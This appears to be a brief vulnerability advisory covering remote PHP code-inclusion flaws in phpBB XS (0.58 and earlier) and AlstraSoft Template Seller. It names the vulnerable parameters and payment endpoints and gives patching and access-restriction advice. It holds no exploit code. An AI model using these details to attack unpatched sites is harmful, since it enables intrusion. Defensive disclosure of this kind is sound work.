Noge A.K.A Da_Jackass

**Name of the Vulnerable Software and Affected Versions** phpBB XS versions 0.58 and earlier **Description** The issue allows remote attackers to execute arbitrary PHP code via a URL in the `phpbb root path` parameter. This is a different vector than previously identified issues. **Recommendations** For phpBB XS versions 0.58 and earlier, at the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** AlstraSoft Template Seller versions prior to the fixed version AltraSoft Template Seller Pro version 3.25 **Description** The issue allows remote attackers to execute arbitrary PHP code. This can be achieved by providing a URL in the `config[template path]` parameter to specific API endpoints, such as "/payment/payment result.php" or "/payment/spuser result.php". **Recommendations** For AlstraSoft Template Seller versions prior to the fixed version, update to the fixed version to resolve the issue. For AltraSoft Template Seller Pro version 3.25, update to a version that contains a fix for this issue. As a temporary workaround, consider restricting access to the `payment result.php` and `spuser result.php` files until a patch is available. Avoid using the `config[template path]` parameter in the affected API endpoints until the issue is resolved.